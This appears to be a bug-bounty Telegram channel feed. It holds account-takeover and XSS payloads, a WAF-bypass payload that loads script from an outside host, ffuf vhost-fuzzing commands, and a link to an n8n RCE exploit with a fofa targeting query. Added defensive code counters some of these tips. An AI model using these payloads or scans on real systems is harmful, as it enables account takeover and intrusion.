SSRF in PDF generators
https://www.intigriti.com/researchers/blog/hacking-tools/exploiting-pdf-generators-a-complete-guide-to-finding-ssrf-vulnerabilities-in-pdf-generators
⭐️ @RadvanSec
Intigriti
Exploiting PDF generators: A complete guide to finding SSRF vulnerabilities in PDF generators
PDF generators are commonly implemented in applications. Developers tend to use these components to generate documents based on dynamic data provided from the database for example. Unfortunately, not...
❤5
Forwarded from آرامش درونی
Father means:
a pillar of certainty;
a steadfast refuge you lean on
with no fear of it collapsing.
Happy Father's Day to all hard-working, devoted fathers.
❤🔥8
Yet another Account Takeover technique.✨
Separator:
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
Array:
{"email":["victim@mail.com","hacker@mail.com"]}
#infosec #CyberSec #bugbountytips
⭐️ @RadvanSec
❤4
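The two tricks above (a separator inside one string, or an array where a string is expected) only work when the email field is accepted loosely and re-parsed later by a mailer. The following is an added example, not code from the post, of a field parser that refuses both shapes. It assumes (constructed for this example) an application that reads the field from either a form-encoded body or a JSON object and a downstream mailer that would split recipients on ",", " " or "|"; the function and class names are this example's own.

```python
"""Hardened handling of a single "email" field.

Added example, not code from the RadvanSec post. It assumes (constructed
for this example) an application that reads the field either from a
form-encoded body or from a JSON object and later hands it to a mailer
that splits recipients on ",", " " or "|"; that combination is what lets
"victim@mail.com,hacker@mail.com" deliver a token to the attacker.
"""
import re
from urllib.parse import parse_qs

# Exactly one address: one local part, one "@", a dotted domain.
# Deliberately stricter than RFC 5322: no quoted local parts, no spaces.
_SINGLE_EMAIL = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+$")
_SEPARATORS = ",;| \t\r\n"


class InvalidEmail(ValueError):
    """Raised for anything that is not a single, well-formed address."""


def normalize_email(value):
    """Return one canonical address or raise InvalidEmail.

    Rejects non-string types (a JSON array or object), embedded recipient
    separators, and anything outside the single-address grammar, so the
    value can be passed to the mailer without it re-parsing the string.
    """
    if not isinstance(value, str):
        # {"email": ["victim@mail.com", "hacker@mail.com"]} ends up here.
        raise InvalidEmail(f"email must be a string, got {type(value).__name__}")
    candidate = value.strip()
    if any(ch in candidate for ch in _SEPARATORS):
        raise InvalidEmail("multiple recipients are not allowed")
    if not _SINGLE_EMAIL.fullmatch(candidate):
        raise InvalidEmail("not a single well-formed address")
    return candidate.lower()


def email_from_form(body):
    """Parse a form body and accept the email field only if it appears once.

    parse_qs percent-decodes, so "%20" becomes a space and is caught by the
    separator check; a repeated key (email=a&email=b) is rejected outright.
    Note that "+" decodes to a space too, so plus-addressing must be sent
    as "%2B".
    """
    values = parse_qs(body, keep_blank_values=True).get("email", [])
    if len(values) != 1:
        raise InvalidEmail("email must appear exactly once")
    return normalize_email(values[0])


def email_from_json(payload):
    """Accept the email field from a decoded JSON object."""
    if not isinstance(payload, dict):
        raise InvalidEmail("payload must be a JSON object")
    return normalize_email(payload.get("email"))


def check_form(body):
    """Convenience wrapper: (accepted, address_or_reason)."""
    try:
        return True, email_from_form(body)
    except InvalidEmail as exc:
        return False, str(exc)


def check_json(payload):
    """Same wrapper for a decoded JSON payload."""
    try:
        return True, email_from_json(payload)
    except InvalidEmail as exc:
        return False, str(exc)


def naive_recipients(value):
    """What a permissive mailer does with the raw field; shown only to
    contrast with normalize_email, which never lets such a string through."""
    return [part for part in re.split(r"[,| ]", value) if part]


if __name__ == "__main__":
    for body in ("email=victim%40mail.com",
                 "email=victim@mail.com,hacker@mail.com",
                 "email=victim@mail.com%20hacker@mail.com",
                 "email=victim@mail.com|hacker@mail.com"):
        print(body, "->", check_form(body))
    print(check_json({"email": ["victim@mail.com", "hacker@mail.com"]}))
```

The design point is that the field is canonicalised once, at the boundary, into a value that cannot contain anything a mailer would treat as a second recipient; the type check covers the array variant, the repeated-key check covers the form variant, and the separator check covers all three string variants from the post.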
Race Condition to Account Takeover
1. User changes email:
POST /change-email → email=x@x(.com
2. Server sends confirmation link, but updates email before verification.
3. Attacker races the victim by claiming password reset for x@x(.com
⭐️ @RadvanSec
#Bugbountytips #BugBounty #CyberSecurity #infosec
#RadvanSec
❤5
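The race in step 3 only exists because step 2 writes the new address before it is confirmed. Below is an added example, not the post's code, of the ordering that removes it: the new address sits in a pending slot and only becomes the account's reset identity once the token mailed to it is redeemed. The in-memory store, the class and function names and the sample addresses are constructed for this example.

```python
"""Email change that does not become effective until confirmed.

Added example, not the original post's code. It models (constructed for
this example) an in-memory account store with a "pending" slot: the new
address is only swapped in when the token sent to it is redeemed, so a
password reset requested for the new address before that point finds no
account, and the race the post describes has nothing to win.
"""
import hashlib
import secrets


def _hash(token):
    return hashlib.sha256(token.encode()).hexdigest()


class AccountStore:
    def __init__(self):
        # user_id -> {"email": verified address, "pending": None | (new_email, token_hash)}
        self.accounts = {}
        # verified email -> user_id; the only index password resets consult
        self.by_email = {}

    def create(self, user_id, email):
        self.accounts[user_id] = {"email": email, "pending": None}
        self.by_email[email] = user_id

    def request_email_change(self, user_id, new_email):
        """Record the request; return the token that is mailed to new_email.
        Only a hash is stored, so a database read cannot replay it."""
        token = secrets.token_urlsafe(32)
        self.accounts[user_id]["pending"] = (new_email, _hash(token))
        return token

    def confirm_email_change(self, user_id, token):
        """Swap the address in only now. Single use: pending is cleared."""
        acct = self.accounts[user_id]
        if acct["pending"] is None:
            return False
        new_email, token_hash = acct["pending"]
        if not secrets.compare_digest(token_hash, _hash(token)):
            return False
        acct["pending"] = None
        if new_email in self.by_email:
            return False  # claimed by another account meanwhile; never overwrite
        del self.by_email[acct["email"]]
        acct["email"] = new_email
        self.by_email[new_email] = user_id
        return True

    def password_reset_target(self, email):
        """User a reset link would be issued for, or None. Pending
        addresses are not consulted, so they cannot redirect a reset."""
        return self.by_email.get(email)


def vulnerable_change_email(store, user_id, new_email):
    """The ordering the post describes: the address is updated before the
    confirmation link is acted on, so a reset for new_email now hits this
    account. Kept here only as the contrast case."""
    acct = store.accounts[user_id]
    del store.by_email[acct["email"]]
    acct["email"] = new_email
    store.by_email[new_email] = user_id


def scenario():
    """Run both orderings and report where a reset for the new address lands."""
    safe = AccountStore()
    safe.create("u1", "victim@example.com")
    token = safe.request_email_change("u1", "new@example.com")
    before_confirm = safe.password_reset_target("new@example.com")
    wrong_token = safe.confirm_email_change("u1", "not-the-token")
    confirmed = safe.confirm_email_change("u1", token)
    after_confirm = safe.password_reset_target("new@example.com")
    old_after_confirm = safe.password_reset_target("victim@example.com")
    replayed = safe.confirm_email_change("u1", token)

    weak = AccountStore()
    weak.create("u1", "victim@example.com")
    vulnerable_change_email(weak, "u1", "new@example.com")
    return {
        "safe_reset_before_confirm": before_confirm,
        "safe_wrong_token": wrong_token,
        "safe_confirmed": confirmed,
        "safe_reset_after_confirm": after_confirm,
        "safe_old_address_after_confirm": old_after_confirm,
        "safe_token_replay": replayed,
        "weak_reset_before_confirm": weak.password_reset_target("new@example.com"),
    }


if __name__ == "__main__":
    for key, value in scenario().items():
        print(f"{key}: {value}")
```

In a real deployment the pending slot would be a column or row with an expiry, and the confirm step would run in a transaction; the property that matters is the one `scenario()` reports: until confirmation, a reset request for the new address resolves to no account.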
Sharing my Burp Extension that earned me $200k in 2025 while API testing heavy JS-rich targets.
https://github.com/jenish-sojitra/JSAnalyzer
The tool helps find endpoints, files, internal emails, and some secrets from minified JS.
Its goal is to achieve maximum efficiency with reduced noise in results. Contributions and feedback are welcome.
⭐️ @RadvanSec
GitHub
GitHub - jenish-sojitra/JSAnalyzer
Contribute to jenish-sojitra/JSAnalyzer development by creating an account on GitHub.
❤2🔥1
🔎 #BugBountyTip Advanced Fuzzing Techniques Most Hunters Miss
0) Setup variables (optional)
DOMAIN="company.com"
ORIGIN="https://company.com" # or https://<cdn-origin> or https://<ip> (ffuf needs a scheme in -u)
WL="words.txt"
HY="hybrid.txt"
1) Direct subdomain fuzz (fast check)
Works when DNS resolves the hostnames.
ffuf -w "$WL" -u "https://FUZZ.$DOMAIN/" -t 200 -mc 200,301,302,401,403 -fs 0 -ac
2) VHOST / Host-header fuzz (CDN / reverse proxy routing)
When wildcard DNS isn’t visible but routing exists.
ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ.$DOMAIN" -t 300 -mc 200,301,302,401,403 -fs 0 -ac
Save results (JSON)
ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ.$DOMAIN" -t 300 -mc 200,301,302,401,403 -fs 0 -of json -o vhost_fuzz.json -ac
3) Hyphenated hosts
ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ-$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
4) Suffix & prefix environment tags
FUZZ-test.company.com
ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ-test.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
test-FUZZ.company.com
ffuf -w "$WL" -u "$ORIGIN" -H "Host: test-FUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
FUZZ.stage.company.com
ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ.stage.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
stage-FUZZ.company.com
ffuf -w "$WL" -u "$ORIGIN" -H "Host: stage-FUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
5) WWW namespace exploitation (🔥)
FUZZwww.company.com
ffuf -w "$HY" -u "$ORIGIN" -H "Host: FUZZwww.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac
wwwFUZZ.company.com
ffuf -w "$HY" -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac
wwFUZZ.company.com
ffuf -w "$HY" -u "$ORIGIN" -H "Host: wwFUZZ.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac
FUZZww.company.com
ffuf -w "$HY" -u "$ORIGIN" -H "Host: FUZZww.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac
6) Numeric drift (use a numbers list)
Create a quick numbers list:
seq -w 0 500 > nums.txt
025www.company.com style
ffuf -w nums.txt -u "$ORIGIN" -H "Host: FUZZwww.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac
www02.company.com style
ffuf -w nums.txt -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac
www-03.company.com style
ffuf -w nums.txt -u "$ORIGIN" -H "Host: www-FUZZ.$DOMAIN" -t 300 -mc 200,301,302,401,403 -fs 0 -ac
03-www.company.com style
ffuf -w nums.txt -u "$ORIGIN" -H "Host: FUZZ-www.$DOMAIN" -t 300 -mc 200,301,302,401,403 -fs 0 -ac
7) Separator drift (dot / hyphen / underscore / none)
Underscore in DNS labels is uncommon but shows up in some internal/service records; test where allowed.
ffuf -w "$WL" -u "$ORIGIN" -H "Host: www-FUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
ffuf -w "$WL" -u "$ORIGIN" -H "Host: www_FUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
ffuf -w "$WL" -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
8) Token fusion (role bleeding)
Use a curated list roles.txt like: api auth cdn static sso id app admin internal edge
ffuf -w roles.txt -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
ffuf -w roles.txt -u "$ORIGIN" -H "Host: FUZZwww.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
9) Third-party / vendor overlay
vendors.txt: jira confluence grafana kibana sentry datadog okta zendesk status
ffuf -w vendors.txt -u "$ORIGIN" -H "Host: FUZZ.$DOMAIN" -t 200 -mc 200,301,302,401,403 -fs 0 -ac
ffuf -w vendors.txt -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
10) Endpoint fuzzing (same mindset, different surface)
ffuf -w endpoints.txt -u "$ORIGIN/FUZZ" -t 200 -mc 200,204,301,302,401,403 -fc 404 -fs 0 -ac
With extensions
ffuf -w endpoints.txt -u "$ORIGIN/FUZZ" -e .php,.asp,.aspx,.jsp,.json,.txt,.bak,.zip -t 200 -mc 200,301,302,401,403 -fc 404 -fs 0 -ac
⭐️ @RadvanSec
👍4
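Every step above leaves the same footprint on the origin: one client sending many distinct Host values in a short window, most of them names the origin does not serve. The following is an added example, not from the post, of detection logic over access logs that keys on that footprint. The log format, the sample lines, the known-host list and the thresholds are all constructed assumptions for this example; the function names are its own.

```python
"""Detecting Host-header (vhost) fuzzing in access logs.

Added example, not from the post. The log format, the sample lines, the
known-host list and the thresholds are constructed assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime

# Assumed log format: $remote_addr $host [$time_local] "$request" $status
LINE = re.compile(
    r'^(?P<ip>\S+) (?P<host>\S+) \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})$'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Hostnames the origin is actually meant to serve (assumption).
KNOWN_HOSTS = frozenset({"www.company.com", "api.company.com"})

# Labels a vhost fuzz run would try, in the spirit of steps 3-9 above.
FUZZED_LABELS = ["dev", "staging", "admin", "internal", "www2", "www-01",
                 "test-api", "grafana", "jira", "sso", "cdnwww", "www_old"]


def build_sample_log():
    """Constructed sample (not a real capture): one ordinary client and one
    client probing twelve Host values at one request per second."""
    lines = [
        '198.51.100.4 api.company.com [10/Feb/2026:10:00:00 +0000] "GET /v1/me HTTP/1.1" 200',
        '203.0.113.7 www.company.com [10/Feb/2026:10:00:01 +0000] "GET / HTTP/1.1" 200',
        '198.51.100.4 www.company.com [10/Feb/2026:10:00:05 +0000] "GET /login HTTP/1.1" 200',
    ]
    for i, label in enumerate(FUZZED_LABELS):
        lines.append(f'203.0.113.7 {label}.company.com [10/Feb/2026:10:00:{2 + i:02d} +0000] '
                     f'"GET / HTTP/1.1" 404')
    lines.append('198.51.100.4 api.company.com [10/Feb/2026:10:01:30 +0000] "GET /v1/me HTTP/1.1" 200')
    return "\n".join(lines)


def parse_log(text):
    """Yield one record per well-formed line; malformed lines are skipped."""
    for raw in text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        yield {
            "ip": m["ip"],
            "host": m["host"].lower(),
            "ts": datetime.strptime(m["ts"], TIME_FMT),
            "status": int(m["status"]),
        }


def detect_vhost_fuzzing(records, window_seconds=60, min_unknown_hosts=10,
                         known_hosts=KNOWN_HOSTS):
    """Per source IP, scan every window_seconds window starting at one of its
    requests and alert on the one with the most distinct Host values outside
    known_hosts, if that count reaches min_unknown_hosts.
    Returns {ip: {"distinct_hosts", "unknown_hosts", "window_start"}}."""
    by_ip = defaultdict(list)
    for r in records:
        by_ip[r["ip"]].append(r)
    alerts = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        best = None
        for i, start in enumerate(recs):
            hosts = set()
            for r in recs[i:]:
                if (r["ts"] - start["ts"]).total_seconds() > window_seconds:
                    break
                hosts.add(r["host"])
            unknown = hosts - known_hosts
            if len(unknown) >= min_unknown_hosts and (
                    best is None or len(unknown) > best["unknown_hosts"]):
                best = {"distinct_hosts": len(hosts), "unknown_hosts": len(unknown),
                        "window_start": start["ts"].isoformat()}
        if best:
            alerts[ip] = best
    return alerts


if __name__ == "__main__":
    for ip, info in detect_vhost_fuzzing(parse_log(build_sample_log())).items():
        print(f"ALERT {ip}: {info}")
```

The constructed client probes one name per second; a run with the thread counts in the commands above produces hundreds of distinct Host values per second, so in practice the threshold can be set far higher than ten without losing the signal. Unknown-host count, rather than raw request count, is used so that a busy legitimate client hitting the two served hostnames never trips the rule.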
Forwarded from GO-TO CVE
Greetings to all dear friends,
Despite the scams and the many problems in some Iranian and foreign bug bounty programs, I decided to launch this channel so that we can gather, in one place, the real experiences of security people who have worked with these programs.
The goal of myself and the dear admins is to review the reports, confirm their accuracy and then make them public, so that other friends do not needlessly waste their time, energy and expertise, and can enter this field, or start working on a particular program, more knowingly.
This channel belongs to all of you: a place for transparency, experience-driven knowledge and support for the country's security community. ⚡️
https://news.1rj.ru/str/bugbountyfeedback
Telegram
BugBountyFeedback
In this channel I write about the platforms and programs we have worked with that, for whatever reason, did not pay the dear bug hunters.
👎3
Found an XSS bypass during a bug bounty:
Backend was only stripping quotes ("), so payload like:
<s"vg o"nload=al"ert() />
turns into a valid:
<noscript onload=alert()>
🚨 Never rely on poor input filtering!
#BugBounty #CyberSecurity
⭐️ @RadvanSec
❤2👍2🔥1
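Stripping one character leaves every other markup-significant character in place, which is why a blacklist filter like the one above fails. As an added example, not the post's code, the block below reproduces that filter, shows what it actually leaves of the quoted payload, and puts contextual HTML output encoding beside it. The `render_comment` wrapper and the event-handler check are constructed helpers for this example, not a general XSS detector.

```python
"""Quote stripping versus output encoding.

Added example, not from the post. It reproduces the post's filter (drop
every double quote), shows what that leaves of the sample payload, and puts
contextual HTML encoding beside it; the event-handler check is a
constructed helper for this example, not a complete XSS detector.
"""
import html
import re

PAYLOAD = '<s"vg o"nload=al"ert() />'   # the payload quoted in the post

# A start tag carrying an on* attribute: the shape the stripped payload takes.
_EVENT_HANDLER_ATTR = re.compile(r"<\s*[a-z][\w-]*[^>]*\son[a-z]+\s*=", re.I)


def strip_quotes(value):
    """The backend filter described in the post: only '"' is removed. The
    characters that matter in an HTML body context ("<", ">", "=") survive."""
    return value.replace('"', "")


def encode_for_html_body(value):
    """Contextual output encoding: every character that can change the
    markup is turned into an entity, so the browser renders it as text."""
    return html.escape(value, quote=True)


def contains_event_handler(markup):
    """True if the markup would be parsed as a tag with an on* attribute."""
    return bool(_EVENT_HANDLER_ATTR.search(markup))


def render_comment(user_text, sanitizer):
    """Embed untrusted text in a page using the given transformation."""
    return f'<div class="comment">{sanitizer(user_text)}</div>'


if __name__ == "__main__":
    for name, fn in (("strip_quotes", strip_quotes), ("html.escape", encode_for_html_body)):
        page = render_comment(PAYLOAD, fn)
        print(f"{name:12} -> {page}  handler={contains_event_handler(page)}")
```

The filter's output for the quoted payload is `<svg onload=alert() />`, a well-formed tag with an event handler; the encoded form contains no `<` at all, so nothing the user typed can open a tag. Encoding is chosen per output context (HTML body here, attribute or JavaScript contexts need different rules), which is the general point behind the post's warning.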
https://portswigger.net/research/top-10-web-hacking-techniques-of-2025-nominations-open
⭐️ @RadvanSec
PortSwigger Research
Top 10 web hacking techniques of 2025: call for nominations
Over the last year, security researchers have shared a huge amount of work with the community through blog posts, presentations, and whitepapers. This is great, but it also means genuinely reusable te
❤4🔥1
#Bypass Imperva, Akamai and CloudFlare WAF
=> Prepend with 50 chars then use
1"><A HRef=%26quot AutoFocus OnFocus%0C={import(/https:X55.is/.source)}>
PoC: x55.is/brutelogic/xss…
⭐️ @RadvanSec
❤3🔥1
Forwarded from Mohammad Nasiri | Founder of the Iran Specialized Information Technology Association
Very good days are coming … have no doubt.
❤11❤🔥1🔥1
Attachment: CVE-2026-21858.yaml (1.8 KB)
n8n Ni8mare - Unauthenticated Arbitrary File Read to RCE Chain
https://github.com/Chocapikk/CVE-2026-21858
fofa:icon_hash="-831756631"
⭐️ @RadvanSec
👍5❤1🔥1